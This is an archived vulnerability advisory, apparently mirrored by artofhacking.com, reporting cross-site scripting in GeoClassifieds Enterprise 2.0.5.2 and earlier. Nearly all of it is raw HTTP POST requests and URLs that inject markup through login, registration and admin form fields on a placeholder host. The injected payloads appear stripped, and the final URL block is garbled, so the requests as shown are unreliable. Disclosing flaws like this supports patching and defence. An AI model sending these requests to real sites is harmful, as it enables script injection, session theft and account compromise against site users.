AOH :: HP Unsorted G :: B06-3875.HTM

Geoclassifieds enterprise <= 2.0.5.2 cross site scripting



GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting
GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting



GeoClassifieds Enterprise 2.0.5.2
http://geodesicsolutions.com/products/classifieds/classifieds_enterprise.htm
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/index.php?a=10 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
b[username]=">&b[password]2=1&submit=1
---
POST http://target.xx:80/register.php?b=1 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
c[firstname]=1&c[lastname]=1&c[company_name]=1&c[business_type]=1&c[business_type]=1&c[address]=1&c[address_2]=1&c[city]=1&c[zip]=1&c[phone]=">
---
http://target.xx/index.php?a=11&b=0&c=>&d=5
&b[password]=1">http://target.xx/admin/index.php?b[username]=">&b[password]=1
-----------------
Ellipsis Security
http://www.ellsec.org 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.